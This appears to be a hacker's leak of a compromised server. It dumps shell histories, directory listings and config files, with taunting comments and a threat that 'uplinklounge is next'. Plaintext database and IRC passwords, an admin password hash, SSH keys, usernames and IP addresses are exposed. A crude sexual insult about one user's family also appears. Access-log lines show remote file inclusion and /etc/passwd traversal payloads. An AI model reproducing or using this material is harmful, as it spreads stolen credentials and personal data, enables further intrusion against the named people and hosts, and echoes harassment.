-nano tmpl/forum.css.tmpl -nano tmpl/index.tmpl -nano tmpl/index.tmpl -cp tmpl/index.tmpl tmpl/index.tmpl.bak -nano -w tmpl/index.tmpl -grep -i "rowstyleb" tmpl/* -grep -i "rowstyleb" tmpl/* | grep -i foot -nano -w tmpl/index.tmpl -nano tmpl/stats.tmpl -grep "newest user" tmpl/* -grep -i "newest user" tmpl/* -nano i18n/english/msg -grep -i "newest_user" tmpl/* -nano tmpl/logedin.tmpl -grep -i "forum_info" tmpl/* -nano tmpl/index.tmpl -grep -i "forum_info" tmpl/* -nano tmpl/logedin.tmpl -grep -i msgr2 tmpl/* -cd tmpl/ -nano drawmsg.tmpl -cd drawmsg.tmpl drawmsg.tmpl.bak -cp drawmsg.tmpl drawmsg.tmpl.bak -nano drawmsg.tmpl -grep -i invisible * -nano ../i18n/english/msg -grep status_li * -nano logedin.tmpl -nano forum.css.tmpl -grep 'GenText fb">Admin' * -grep 'GenText fb' * -grep 'GenText fb' * | grep admin -nano admincp.tmpl -nano forum.css.tmpl -nano ~/public_html/themes/bc/main.css -nano forum.css.tmpl -nano ~/public_html/themes/bc/main.css -grep post_reply * -nano msg.tmpl -nano msg.tmpl -grep new_thread * -nano msg.tmpl -grep new_thread_link * -nano thread_view_common.tmpl -grep show_links * -nano show.tmpl -nano thread_view_common.tmpl -grep th_650 * -nano msg.tmpl -nano msg.tmpl -grep th_650 * -nano msg.tmpl -nano thread.tmpl -grep new_t * -nano msg.tmpl -nano drawmsg.tmpl -nano forum.css.tmpl -nano ~/public_html/themes/bc/main.css -grep '$user' * -grep '$user' ../../../src/* -nano forum.css.tmpl -nano ../../../../public_html/apps.php -nano forum.css.tmpl -grep uc_buddy * -nano forum.css.tmpl -grep users_online * -nano logedin.tmpl -nano logedin.tmpl -nano forum.css.tmpl -grep reg_user * -grep reg_user_op * -nano forum.css.tmpl -cd -cd public_html/ -nano index.php -nano index040108.php -nano ../bcincludes/main.php -nano index040108.php -nano ../bcincludes/bottom.php -nano index040108.php -nano ../bcincludes/main.php -nano ../bcincludes/recent.php -nano themes/bc/main.css -nano ../bcincludes/recent.php -cd -nano public_html/index. -nano public_html/index.php -nano public_html/themes/bc/main.css -cd public_html/images/ -ls -mkdir ficons -nano ../index.php -clear -cd -cd public_html/ -nano index. -nano index.php -ls -nano index.php -cd apps -ls -nano bc-info.php -cd -nano bc-info.php -nano public_html/apps/bc-info.php -nano bcincludes/main.php -ls -nano bcincludes/irc.php -nano bcincludes/irc.php -nano bcincludes/irc.php -tail /var/www/logs/error_log -nano bcincludes/irc.php -nano bcincludes/top.php -nano bcincludes/irc.php -nano bcincludes/ads.php -ls -cd bcincludes/ -mkdir ad -mkdir ad/top -mkdir ad/sider -mkdir ad/side -nano ad/top/ -nano ad/top/0 -nano ad/top/1 -nano ad/top/0 -ls ad -nano ../public_html/index.php -tail /var/www/logs/error_log -tail /var/www/logs/error_log -ls -ls ad -ls /var/www/users/bc/bcincludes/ad/top/ -ls /var/www/users/bc/bcincludes/ad/top/ -tail /var/www/logs/error_log -LS -LH -ls -lh -ls -lh ad/side -ls -lh ad/side/ -ls -lh ad/top/ -tail /var/www/logs/error_log -tail /var/www/logs/error_log -nano ../FUDforum/include/GLOBALS.php -ls n -ls -nano mkurl.php -mkdir cache -tail /var/www/logs/error_log -ls -lh /var/www/users/bc/bcincludes/ad/top/ -tail /var/www/logs/error_log -ls -ls -lha -ls ad -ls -lh ad -ls -lh ad -ls -lh ad/side -ls -lh ad/side/ -ls -lh ad/top/ -cd -nano public_html/index.php -mv bcincludes/ad public_html/ -ls public_html/ad/ -nano public_html/index.php -ls -cd public_html/ -ls -nano user.php -ls -ls cgi-bin/ -nano user.php -php -l user.php -nano user.php -php -l user.php -nano user.php -nano ../FUDforum/include/GLOBALS.php -nano user.php -cd ../bcincludes/ -nano ulast.php -mysql -u fud -p fud -cd -cd public_html/ -nano test.php -mysql -u fud -p fud -nano test.php -tail /var/www/logs/error_log -tail /var/www/logs/error_log -nano ../bcincludes/main.php -tail /var/www/logs/error_log -tail /var/www/logs/error_log -tail /var/www/logs/error_log -tail /var/www/logs/error_log -tail /var/www/logs/error_log -tail /var/www/logs/error_log -tail /var/www/logs/error_log -tail /var/www/logs/error_log -cd -cd public_html/apps -ls -mkdir bc-info -nano ../../bcincludes/main.php -tail /var/www/logs/error_log -cd -nano FUDforum/scripts/fudapi.inc.php -cd -cd public_html/ -ls -nano user.php -php -l user.php -nano user.php -cp chat.php chat.old.php -nano chat.php -echo > chat.php -nano chat.php -php -l chat.php -nano chat.php -mysql -u harry -p hb_ng -tail /var/www/logs/error_log -tail /var/www/logs/error_log -tail /var/www/logs/error_log -nano labs-old.php -tail /var/www/logs/error_log -tail /var/www/logs/error_log -nano themes/bc/main.css -cd -nano public_html/index -nano public_html/index. -nano public_html/index.php -nano bcincludes/ -nano bcincludes/defleft. -nano bcincludes/defleft.php -nano bcincludes/defright.php -nano public_html/ad/side/a -nano bcincludes/top.php -nano FUDforum/thm/BC/tmpl/header.tmpl -nano FUDforum/thm/BC/tmpl/header.tmpl -nano FUDforum/thm/BC/tmpl/forum.css.tmpl -whois uplinklounge.com -whois uplinklounge.com | less -exit -screen -rd -exit -cd public_html/ -nano apps.php -nano scripts/app_panel.js.php -nano apps.php -nano scripts/app_panel.js.php -nano scripts/app_panel.js.php -nano scripts/app_config.php -nano apps.php -nano scripts/app_config.php -nano scripts/app_panel.js.php -nano scripts/lib.js.php -nano apps/recent-uploads.php -nano apps/ntools.php -nano apps.php -cd apps -ls -nano milworm-rss.php -cd -cd FUDforum/scripts/ -ls -nano rdf_parser.php -cd -mysql -u harry -p hb_ng -cd public_html/cgi-bin/ -ls -nano scan.cgi -cd .. -cd scan -ls -nano index.php -nano scan.php -tail /var/www/logs/error_log -nano scan.php -nano scan.php -cd ../cgi-bin/ -nano test.cgi -chmod +x test.cgi -nano test.cgi -mv test.cgi scan.cgi -nano scan.cgi -whereis nmap -ls /usr/local/etc/ -cd /usr/local/ -ff nmap -cd -cd public_html/ -nano /usr/local/share/nmap/nmap-service -nano /usr/local/share/nmap/nmap-services -nmap -cd cgi-bin/ -ls -nano scan.cgi -nano /downloads/qmailrocks/qmail-scanner-1.25/contrib/qmail-scanner-queue.c -cd -nano nmap-runner.c -man execv -nano nmap-runner.c -gcc -o nmap-runner nmap-runner.c -./nmap-runner --help -nano nmap-runner.c -./nmap-runner -sS google.com -./nmap-runner -sT google.com -nano nmap-runner.c -gcc -o nmap-runner nmap-runner.c -nano nmap-runner.c -nano nmap-runner.c -gcc -o nmap-runner nmap-runner.c -./nmap-runner --help -./nmap-runner -nano nmap-runner.c -gcc -o nmap-runner nmap-runner.c -./nmap-runner -./nmap-runner -./nmap-runner -./nmap-runner -nano nmap-runner.c -gcc -o nmap-runner nmap-runner.c -./nmap-runner test -./nmap-runner test 2 -nano nmap-runner.c -./nmap-runner test 2 -./nmap-runner test 2 -/usr/local/bin/nmap -nano nmap-runner.c -nano nmap-runner.c -gcc -o nmap-runner nmap-runner.c -./nmap-runner test 2 -nano nmap-runner.c -gcc -o nmap-runner nmap-runner.c -./nmap-runner test 2 -man exec -nano nmap-runner.c -gcc -o nmap-runner nmap-runner.c -nano nmap-runner.c -gcc -o nmap-runner nmap-runner.c -./nmap-runner test 2 -nano nmap-runner.c -nano nmap-runner.c -gcc -o nmap-runner nmap-runner.c -./nmap-runner test 2 -nano nmap-runner.c -gcc -o nmap-runner nmap-runner.c -./nmap-runner ededf -./nmap-runner --help -gcc -o nmap-runner nmap-runner.c -nano nmap-runner.c -gcc -o nmap-runner nmap-runner.c -./nmap-runner --help -./nmap-runner -sV google.com -nano nmap-runner.c -./nmap-runner google.com -gcc -o nmap-runner nmap-runner.c -./nmap-runner google.com -nano scanjob.php -cd -grep 72.29.82.80 /var/www/logs/access_log > 72.29.82.80.log -exit -cd -source .bashrc -ls -clear -screen -r -screen -cd FUDforum/thm/BC/tmpl -nano actions.tmpl -cd -screen -r -screen -rd -clear -clear -mkdir chat -cd bcincludes/ -cp main.php light.php -nano light.php -cd -cd public_html/ -mkdir chat -cd chat -nano index.php -screen -r -cd -screen -r -cd FUDforum/ -cd thm/BC/ -cd tmpl -;ls -ls -nano ppost.tmpl -cp ppost.tmpl ppost.tmpl.bak -nano -w ppost.tmpl -nano forum.css.tmpl -nano -w ppost.tmpl -grep file_ * -nano post_common.tmpl -nano -w ppost.tmpl -nano post_common.tmpl -nano -w ppost.tmpl -nano -w ppost.tmpl -grep fud_code_icons * -nano post_common.tmpl -nano smiley.tmpl -grep GenText * - -grep GenText * | grep -v usrinfo -nano -w ppost.tmpl -grep MsgR3 * -nano post_common.tmpl -grep MsgR3 * -nano -w ppost.tmpl -cd .. -cd i18n/english/ -ls -nano msg -nano -w msg -tail /var/www/logs/error_log -nano -w msg -cd -cd public_html/ -cp rules.php rules.bak.php -nano rules.php -nano newrules.php -cd bcincludes/ -ls -nano main.php -cd public_html/apps -ls -nano forum-posts.php -nano ../../bcincludes/recent -nano ../../bcincludes/recent.php -exit -$ cat .ssh/known_hosts -uplinklounge.com,65.41.206.199 ssh-rsa -AAAAB3NzaC1yc2EAAAABIwAAAIEAtv9mPiubjzgpgbo7TMDHeAdwPftN1qbn2Cpqwypd/pejS+Ax73C -ySGkMnkaCR7fpFrL7k7Af3B+QHZu1OxxlYzcMvWSlECj7xkc5642LwjL0RMvuSS8k3zDeN93THYpUAu -QfUFjsGD53UWLa8OqBgcLxWlrbJ9z7Gdan9/yyCqs= -##keep your mouths shut or uplinklounge is next -$ cat sql/query.php -<?php -@mysql_connect(':/tmp/mysql.sock', 'fud', 'jdn52gj'); #eleet -@mysql_select_db('fud'); -$q = "select count(id) from fud26_users"; -$r = mysql_query($q); -?> -$ cd /var/www/users/bcbot -$ cat harry.conf -#use ssl:// for ssl connections -server = 69.31.131.54 -port = 6667 -#space-delimited list of channels -channels = #uplinklounge #blackcode - -db_name = hb_ng -db_user = harry -db_pass = jdn52gj -db_host = localhost - -nick = hb-mk3 -name = harry -nickserv = jdn52gj - -notify_scripts = http://www.uplinklounge.com/botter.php - -command_queue = /var/www/users/bcbot/command_queue - -msg_sleep = 1 - -command_socket_bind = 0.0.0.0 -logmethod = mysql - -homedir = /home/bcbot -$ cd /var/www/users/darkmalice -$ ls -la -total 36 -drwxr-xr-x 6 darkmalice darkmalice 512 Jan 26 23:32 . -drwxr-xr-x 14 root daemon 512 Feb 26 16:40 .. --rw------- 1 darkmalice darkmalice 245 Jan 25 20:27 .bash_history --rwx------ 1 darkmalice darkmalice 549 Jan 25 18:56 .bashrc -drwx------ 2 darkmalice darkmalice 512 Jan 25 19:00 .log --rwx------ 1 darkmalice darkmalice 549 Jan 24 20:27 .profile -drwxr-xr-x 2 darkmalice darkmalice 512 Jan 25 18:56 .ssh -drwxr-xr-x 2 darkmalice darkmalice 512 Jan 27 00:18 C-Dev -drwxr-xr-x 3 darkmalice darkmalice 512 Feb 12 04:07 public_html -$ cd public_html -$ cat test.php ##thats just excellent, secure and informative! -<?php -echo shell_exec('whoami'); -?> -$ cd /var/www/users/eweng -$ ls -la -total 32 -drwxr-xr-x 5 eweng eweng 512 Oct 3 2006 . -drwxr-xr-x 14 root daemon 512 Feb 26 16:40 .. --rw------- 1 eweng eweng 105 Aug 20 2006 .bash_history --rw-r--r-- 1 eweng eweng 615 Aug 20 2006 .bashrc --rw-r--r-- 1 eweng eweng 615 Aug 20 2006 .profile -drwxr-xr-x 3 eweng eweng 512 Sep 28 2006 For Iadnah -drwx------ 37 eweng eweng 1024 Aug 20 2006 SiteUpload -drwxr-xr-x 3 eweng eweng 512 Oct 1 2006 public_html -$ ls -la public_html -total 47396 -drwxr-xr-x 3 eweng eweng 512 Oct 1 2006 . -drwxr-xr-x 5 eweng eweng 512 Oct 3 2006 .. --rw-r--r-- 1 eweng eweng 6129797 Oct 1 2006 LV.rar --rw-r--r-- 1 eweng eweng 11438285 Oct 1 2006 PLV.rar --rw-r--r-- 1 eweng eweng 3255358 Oct 1 2006 S1LV.rar --rw-r--r-- 1 eweng eweng 2894417 Oct 1 2006 TLV.rar --rwxrwxrwx 1 eweng eweng 5227 Aug 20 2006 catch.php -drwxr-xr-x 2 eweng eweng 512 Aug 20 2006 cgi-bin --rw-r--r-- 1 eweng eweng 34 Oct 1 2006 index.php --rwxrwxrwx 1 eweng eweng 1006 Aug 20 2006 proxy.php --rw-r--r-- 1 root eweng 30 Aug 20 2006 test.php --rwxrwxrwx 1 eweng eweng 398268 Aug 20 2006 xanon.txt -$ cd wiki -$ ls -la -total 108068 -drwxr-xr-x 5 wiki wiki 512 Feb 17 09:58 . -drwxr-xr-x 14 root daemon 512 Feb 26 16:40 .. --rw------- 1 wiki wiki 4437 Jun 18 2007 .bash_history --rw------- 1 wiki wiki 389 Jun 18 2007 .mysql_history --rw-r--r-- 1 root wiki 5353996 Nov 21 00:46 db.sql -drwxr-xr-x 2 wiki wiki 1024 Nov 11 2006 mediawiki-1.8.2 --rw-r--r-- 1 wiki wiki 3491471 Oct 13 2006 mediawiki-1.8.2.tar.gz -drwxr-xr-x 16 root wiki 1024 Feb 17 09:59 old -drwxr-xr-x 3 wiki wiki 512 Feb 17 10:00 public_html --rw-r--r-- 1 root wiki 46387200 Nov 21 00:47 public_html.tar -$ cd vpopmail -$ ls -la -total 20964 -drwxr-xr-x 11 vpopmail vchkpw 512 Jan 4 2007 . -drwxr-xr-x 14 root daemon 512 Feb 26 16:40 .. --rw-r--r-- 1 root vchkpw 43 Aug 26 2006 .2782 --rw------- 1 vpopmail vchkpw 2560 Jan 4 2007 .bash_history -drwx------ 2 vpopmail vchkpw 512 Aug 28 2006 .gnupg --rw------- 1 vpopmail vchkpw 1222 Jan 4 2007 .mysql_history -drwx------ 2 vpopmail vchkpw 512 Jul 13 2007 .spamassassin --rw------- 1 vpopmail vchkpw 4 Sep 4 2006 asshat.log ## echo iadnah ->> asshat.log --rw-r--r-- 1 vpopmail vchkpw 0 Jan 4 2007 badhosts -drwxr-xr-x 2 vpopmail vchkpw 512 Aug 26 2006 bin -drwxr-xr-x 4 vpopmail vchkpw 512 Aug 26 2006 doc -drwx------ 3 vpopmail vchkpw 512 Aug 26 2006 domains -drwxr-xr-x 2 vpopmail vchkpw 512 Aug 26 2006 etc --rw-r--r-- 1 root vchkpw 302 Jan 4 2007 hourly.php --rw------- 1 vpopmail vchkpw 45507 Sep 5 2006 iadnah.log -drwxr-xr-x 2 vpopmail vchkpw 512 Aug 26 2006 include -drwxr-xr-x 2 vpopmail vchkpw 512 Aug 26 2006 lib --rwxr-xr-x 1 vpopmail vchkpw 83 Sep 4 2006 log.sh -drwxr-xr-x 5 vpopmail vchkpw 512 Sep 3 2006 public_html --rwxr-xr-x 1 root vchkpw 3413 Aug 27 2006 qtrap-2.0.0 --rwxr-x--- 1 vpopmail vchkpw 1059 Sep 3 2006 scantest.sh --rw-r--r-- 1 vpopmail vchkpw 2661535 Sep 3 2006 senderlog.log --rwxr-x--- 1 root vchkpw 2874 Aug 27 2006 spamscan.php --rwxr-xr-x 1 vpopmail vchkpw 1408 Jan 4 2007 test.php --rwxr-x--- 1 vpopmail vchkpw 129 Sep 4 2006 test.sh --rw------- 1 vpopmail vchkpw 7914224 Jan 13 2007 vars --rw-r--r-- 1 vpopmail vchkpw 67 Aug 22 2006 vqadmin.passwd -$ cat vqadmin.passwd -admin:$2a$06$ovAh75s8sGRlHF/PnuPyRuQaSMDEPyU78.oogkZILoPai9ft.nbcG -$ cd /home -$ ls -la -total 56 -drwxr-xr-x 14 root wheel 512 Feb 26 10:16 . -drwxr-xr-x 23 root wheel 1024 Apr 7 12:17 .. -drwxr-xr-x 3 iadnah iadnah 512 Aug 20 2007 backup -lrwxr-xr-x 1 root wheel 17 Nov 7 2006 bc -> -/var/www/users/bc -lrwxr-xr-x 1 root wheel 20 Nov 7 2006 bcbot -> -/var/www/users/bcbot -drwxr-xr-x 21 bridge bridge 1024 Feb 17 10:05 bridge -lrwxr-xr-x 1 root wheel 25 Jan 24 20:25 darkmalice -> -/var/www/users/darkmalice -drwxr-xr-x 6 devel devel 512 Dec 18 20:03 dev -lrwxr-xr-x 1 root wheel 21 Feb 26 10:14 eweng -> -/var/www/users/eweng/ -lrwxr-xr-x 1 root wheel 27 Feb 26 10:14 harrybotter -> -/var/www/users/harrybotter/ -drwxr-xr-x 16 iadnah iadnah 1536 Apr 4 09:02 iadnah -drwxr-xr-x 6 lloth lloth 512 Feb 12 08:33 lloth -drwxr-xr-x 4 logger logger 512 Nov 27 2006 logger -lrwxr-xr-x 1 root wheel 22 Feb 26 10:15 mdfive -> -/var/www/users/mdfive/ -drwxr-xr-x 6 myrmidon666 myrmidon666 512 Feb 7 13:39 myrmidon666 -drwxr-xr-x 2 origin origin 512 Jan 26 16:26 origin -lrwxr-xr-x 1 root wheel 19 Nov 7 2006 phox -> -/var/www/users/phox -drwxr-xr-x 2 qscand qscand 512 Oct 11 2006 qscand -drwxr-xr-x 8 silcbot silcbot 512 Aug 20 2007 silcbot -lrwxr-xr-x 1 root wheel 15 Feb 26 10:16 users -> -/var/www/users/ -lrwxr-xr-x 1 root wheel 23 Nov 7 2006 vpopmail -> -/var/www/users/vpopmail -drwxr-xr-x 6 wiki wiki 512 Oct 24 2006 wiki -drwxr-xr-x 2 x x 512 Aug 7 2006 x -$ ls -la backup -total 7414380 -drwxr-xr-x 3 iadnah iadnah 512 Aug 20 2007 . -drwxr-xr-x 14 root wheel 512 Feb 26 10:16 .. -drwxr-xr-x 9 iadnah iadnah 512 Aug 16 2007 bc --rw-r--r-- 1 iadnah iadnah 1071779840 Aug 17 2007 bc.tar --rw-r--r-- 1 iadnah iadnah 9195520 Aug 17 2007 etc.tar --rw-r--r-- 1 iadnah iadnah 965959680 Aug 17 2007 home.tar --rw-r--r-- 1 iadnah iadnah 1308293120 Aug 17 2007 iadnah.tar --rw-r--r-- 1 iadnah iadnah 11223040 Aug 17 2007 log.tar --rw-r--r-- 1 iadnah iadnah 5068800 Aug 17 2007 silc.tar --rw-r--r-- 1 iadnah iadnah 360314880 Aug 17 2007 sql.tar --rw-r--r-- 1 iadnah iadnah 14028800 Aug 17 2007 wiki.tar --rw-r--r-- 1 iadnah iadnah 49141760 Aug 17 2007 wiki2.tar -$ ls -la iadnah -total 933148 -drwxr-xr-x 16 iadnah iadnah 1536 Apr 4 09:02 . -drwxr-xr-x 14 root wheel 512 Feb 26 10:16 .. -drwx------ 3 iadnah iadnah 512 Oct 11 2006 .BitchX --rw-r--r-- 1 iadnah iadnah 0 Oct 6 2006 .addressbook --rw------- 1 iadnah iadnah 2285 Oct 6 2006 .addressbook.lu --rw------- 1 iadnah iadnah 7013 Apr 7 02:07 .bash_history --rw-r--r-- 1 iadnah iadnah 616 Aug 2 2006 .bashrc -drwxr-xr-x 2 iadnah iadnah 512 Aug 19 2007 .bin -drwxr-xr-x 2 iadnah iadnah 512 Aug 19 2007 .log --rw-r--r-- 1 iadnah iadnah 317 Mar 2 2006 .login --rw-r--r-- 1 iadnah iadnah 105 Mar 2 2006 .mailrc --rw------- 1 iadnah iadnah 3135 Dec 11 20:38 .mysql_history --rw------- 1 iadnah iadnah 17542 Nov 6 2006 .pine-debug1 --rw------- 1 iadnah iadnah 17499 Nov 6 2006 .pine-debug2 --rw------- 1 iadnah iadnah 17217 Nov 6 2006 .pinerc -drwxr-xr-x 2 iadnah iadnah 512 May 30 2007 .ssh -drwxr-xr-x 3 iadnah iadnah 512 Dec 19 21:52 .subversion --rw-r--r-- 1 iadnah iadnah 262144 Aug 25 2007 404.log --rw-r--r-- 1 iadnah iadnah 2916352 Apr 4 07:54 Maya8.5.iso -drwx------ 37 iadnah iadnah 1024 Jun 3 2007 SiteUpload --rw-r--r-- 1 iadnah iadnah 526749 Aug 20 2007 acct.gz --rw-r--r-- 1 iadnah iadnah 1356 Mar 25 21:22 arab.txt --rw-r--r-- 1 iadnah iadnah 3332 Mar 26 17:39 attacker --rw-r--r-- 1 iadnah iadnah 3491 Sep 3 2006 bc.png --rw-r--r-- 1 iadnah iadnah 11489 Aug 12 2006 bc_bot.sql --rw-r--r-- 1 iadnah iadnah 131 Sep 17 2007 biotraineeship.txt --rw-r--r-- 1 iadnah iadnah 254 Oct 19 2007 crypt.php --rw-r--r-- 1 iadnah wheel 1756972 Mar 25 20:33 etterlog.pcap --rw-r--r-- 1 iadnah iadnah 967 Mar 26 17:26 fuckers --rw-r--r-- 1 iadnah iadnah 8569 Sep 19 2007 harry_botter.pl -drwxr-xr-x 2 iadnah iadnah 512 Dec 12 00:02 hb-ng --rw-r--r-- 1 iadnah iadnah 1042 Feb 24 18:53 iadnah@iadnah.ath.cx --rwxr-xr-x 1 iadnah iadnah 401 Feb 5 20:06 id_rsa.pub --rw-r--r-- 1 iadnah iadnah 391683 May 30 2007 img.tar.gz ##ewwww his -moms nudes --rw-r--r-- 1 iadnah iadnah 12905 Aug 12 2006 info --rw-r--r-- 1 iadnah users 105000960 Sep 28 2006 intel.tar --rw-r--r-- 1 iadnah iadnah 14940925 Jun 20 2007 ip --rw-r--r-- 1 iadnah iadnah 226968 Jun 20 2007 iplist --rwxr-xr-x 1 iadnah iadnah 5864 Aug 6 2006 jack.php --rw-r--r-- 1 iadnah iadnah 6507478 Jun 20 2007 jun.log.bz2 --rw-r--r-- 1 iadnah iadnah 940 Jun 20 2007 log.php --rw-r--r-- 1 root wheel 19306021 Aug 19 2007 log2.pcap.gz --rw-r--r-- 1 iadnah iadnah 1431 Sep 20 2006 lost -drwx------ 2 iadnah iadnah 512 Nov 6 2006 mail --rw-r--r-- 1 iadnah iadnah 311838720 Feb 2 15:20 maya.tar --rw-r--r-- 1 iadnah iadnah 40022 May 30 2007 menuBkgd.jpg --rw-r----- 1 iadnah iadnah 2995 Apr 24 2007 named.conf --rwxr-xr-x 1 root iadnah 225 Aug 22 2006 netstat_parse.php -drwxr-xr-x 10 iadnah iadnah 3072 Nov 29 15:42 nmap-4.20 -drwxr-xr-x 2 iadnah iadnah 512 May 31 2007 pack --rw-r--r-- 1 iadnah iadnah 1801521 Mar 25 19:40 packetlog.dump --rw-r--r-- 1 root iadnah 400524 Nov 30 06:31 perl.log --rw-r--r-- 1 iadnah iadnah 3631433 Mar 26 17:12 pjirc.log -drwxr-xr-x 4 iadnah iadnah 512 Jun 20 2007 public_html --rw-r--r-- 1 iadnah iadnah 1042 Dec 19 02:39 rkhunter-1.3.0_obsd.patch --rwxr-xr-x 1 iadnah iadnah 835 Aug 28 2006 sentral.php --rw-r--r-- 1 root iadnah 2058 Aug 22 2006 spam --rw-r--r-- 1 root iadnah 1529 Dec 7 2006 spammers -drwxr-xr-x 15 iadnah iadnah 4096 Mar 6 2007 ssh -drwxr-xr-x 2 iadnah iadnah 512 May 30 2007 stuff --rw-r--r-- 1 iadnah iadnah 6942720 May 30 2007 stuff.tar -drwxr-xr-x 4 iadnah iadnah 512 Dec 19 22:10 test --rw-r--r-- 1 iadnah iadnah 35035 Aug 6 2006 test.html --rw-r--r-- 1 iadnah iadnah 37 Aug 30 2006 test.php --rw-r--r-- 1 iadnah iadnah 557056 Feb 28 19:01 thing.iso --rw-r--r-- 1 iadnah iadnah 1017 Sep 1 2006 top_bar.jpg --rw-r--r-- 1 iadnah iadnah 10597 Sep 1 2006 top_main.jpg -$ cat fuckers ##if they are fuckers, what are we :0...and what are you? 0wned. -www.blackcode.com 72.29.70.163 - - [25/Mar/2008:22:01:17 -0400] "GET -/pjirc//irc.php?phpEx=http://www.soscontacto.com.mx/rateme_v1.3.2/images/doc/ar -ab.txt? HTTP/1.1" 404 320 "-" -"libwww-perl/5.808" -www.blackcode.com 72.29.82.80 - - [26/Mar/2008:07:12:54 -0400] "GET -/pjirc//irc.php?phpEx=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" -404 320 "-" "libwww-perl/5.808" -www.blackcode.com 72.29.82.80 - - [26/Mar/2008:07:40:26 -0400] "GET -/pjirc/index.old.php//irc.php?phpEx=http://www.spices.res.in/biotraineeship.txt -? HTTP/1.1" 404 - "-" -"libwww-perl/5.808" -www.blackcode.com 71.79.136.31 - - [26/Mar/2008:16:56:32 -0400] "GET -/pjirc/index.php?phpEx=./../../../../../../etc/passwd HTTP/1.1" 200 5863 "-" -"Mozilla/5.0 (X11; U; Linux i686; en-US; -rv:1.8.1.12) Gecko/20080302 Firefox/2.0.0.12" -www.blackcode.com 66.249.65.244 - - [26/Mar/2008:16:56:33 -0400] "GET -/pjirc/index.php?phpEx=./../../../../../../etc/passwd HTTP/1.1" 200 5863 "-" -"Mediapartners-Google" -$ cat .ssh/* -ssh-rsa -AAAAB3NzaC1yc2EAAAABIwAAAIEA8AKJYx7Rf1qdozVJvF9SjgfeDQb259Y9e6edMUanHdCWXSyaAls -TBEaHdEdPSiILi9YXRna8oYLnuITTU2TB9sdglsGfO5Eqyi/5zAPGbtGGFJQWCcynWx0J9zEAEPkgEv -x2X5EzuLRASwsoOAU4Ag9uSL0B5qRykUeaLfCphvM= -iadnah@magus -ssh-rsa -AAAAB3NzaC1yc2EAAAABIwAAAIEA3RLXUh+xSrAQdAz7MMs86nnWawYocxP+BJh4Tc2wkxr/k2I8YSB -QT4F+rqG5/WbHNFIanrbQ9YFf+dArCgPeRJWsnQXmKKJHJDqYQKJfbORAgLc1wWPx1fEIn/8I2D2lnD -wlpcfEmA927RSgYCXiq9owWACiNA/0ZbOwrnerCd0= -iadnah@nowhere -ssh-rsa -AAAAB3NzaC1yc2EAAAABIwAAAQEAs62oMrHkJDRGUBNYQB/R+Ns7VC59BtLPTG/huCx2r6VLbdYRdh0 -epgc0Pakl8DwG0ttsoEH0bnov+WxwDyaC3fP71rqn57oFboHcnMQ3tmeQC/oB6RwT39ZMmsp7RdeRYs -8AfHQxquVMJjRB/mKNM5c3Fornhujbfo9pZMmCXHdl17JEu/mpFAShNe4wnzURT3u/wWtIMiB43qFlN -p3kBKFMe3ZFMjmvsinyKQzYX1hzLZVdprLzWvSEbSnC56HUF5BAbTLy6gvFac9OM293wLOOuNDuGRLc -Kv9dPjwSbaUHAFkNZhPdRVtf7Bo7VMkiilUPlUbU/UuRG8aAuzk27Q== -root@acolyte -uplinklounge.com,70.86.176.7 ssh-rsa -AAAAB3NzaC1yc2EAAAABIwAAAIEAxaCb8al7vXALpUL1nsqraIVb7vPu5SvMsEhAimAQLhk3HA4fGvL -EqoGZkr8WamQtepcZ5unNYqiCZE76AE4kIshmlV4KQNrNxbdgeP5ZXoEOydqSFSKHOJXG556VV4j6t+ -vP97By6SsUjmWrOdKFZkRri1+bYsofCupNSE04fX8= -iadnah.ath.cx,71.79.136.31 ssh-rsa -AAAAB3NzaC1yc2EAAAABIwAAAQEApJcnHYhEWEcXfxjj4VjWtpi2kB9zVZYnLW9OoMqzNc7T6DSK0DB -9o2QCBwzo8+dLkVRg3YYEFDSlIAxMl4amITMXpPAqtgD99Kug7ImAaS9PwDHkgdHWZo7Q9ih/q9AeeO -jsMpHBvK9GpIZ9MMSIknpoIk5VbqcYeH+oRZwvbMRwg9qep5Y2KYaEnhlWnTiuM6qOW6I7q0REcD9uG -/bVwt+c7RKh30vFXe6NKQRadxzgGsDY9Lkx1+85UxAsEhjVHOCvHGRLZaFJe3wyuNvNFKETWTb5c0m0 -C2poeKw14dTS8hHYHJ7X2Q7dCPkoY1UtK1oHntvL6tE+Hw2S/LwDmw== -$ cat id_rsa.pub -ssh-rsa -AAAAB3NzaC1yc2EAAAABIwAAAQEA8j13HSYyTQl6jsPNpACUi/8b01lA8XW0Y/uNlLZcohHsSbWbqgI -nLsDkWvs5U6Y2H0eUkCft+2TiY/B9FtJjg+rrMtInAvIJlVIvAycQGUAdHtgvg/etkeQ0pE2f03bzii -+Kn6pAjgkCrT5yflk3kkM+lDNc6KgfIX6OyyDngyxfNncR3BNKr1alFgImovnDDNnaQq8mvg5Xw1NGE -797RJhF3+cXE2ckgbW8VQjoFkXjmoWsu/+sIrAlfVGLlvfrVn6byesswQ1M/nOGc6CNmL8Be8JL47p5 -JeBl7sm2reb0nFmUvSwKpYYduu1a1VJgEbOSn1ZeYmTsBzOvRs4HzQ== -myrmidon666@dasboot -$ cat /home/silcbot/.bash_history -cd -ls -ls -ls -lh -ls -lh Maildir/ -ls -lh Maildir/* -rm -Rf Maildir/ -silc --connect localhost -exit -cd .sil -ls -cd -cd .silc/ -ls -mkdir scriptsa -mv scriptsa/ scripts -cd scripts/ -nano lastspoke.pl -exit -cd -cd -silc --connect 72.232.51.250 -cd .silc/ -ls -nano silc.conf -cd -silc -nano silc.conf -nano .silc/silc.conf -silc -nano .silc/silc.conf -silc -nano .silc/silc.conf -silc -silc -silc -silc -silc -exit -cd -ls -ls -rm silc.core -ulimit -ulimit -h -ls -ls .silc/ -mv .silc/silc.conf .silc/silc.conf.bak -cd -silc -nano .silc/silc.conf -cd -silc -exit -cd -cd -silc -silc -silc -ls -lh /var/run/ -netstat | grep mysel -netstat | grep mysql -netstat -n | grep mysql -ln -s /tmp/mysql.sock /var/run/mysql/mysql.sock -exit -cd -cd -silc -cd -silc -ls -exit -ls -rm silc.core -screen silc -exit -ls -ls logs/ -ls logs -tail logs/chatlog -tail logs/userlog -ls -ls logs -tail logs/nicklog -cd .silc/ -ls -nano scripts/harry_botter.pl -ls -lh -screen -x -screen -x -screen -x -exit -pwd -screen -r -ls -l -cd silcbot -cd silcbot -pwd -ls -l -cd . -cd .. -ls -l -cd silcbot -ls -ls -h -ls -help -ls -help -ls -g -nano /home/silcbot/.silc/scripts/harry_botter.pl -cd .silc/scripts/ -ls -mkdir ~/channels/uplinklounge -mkdir -p ~/channels/uplinklounge -mkdir -p 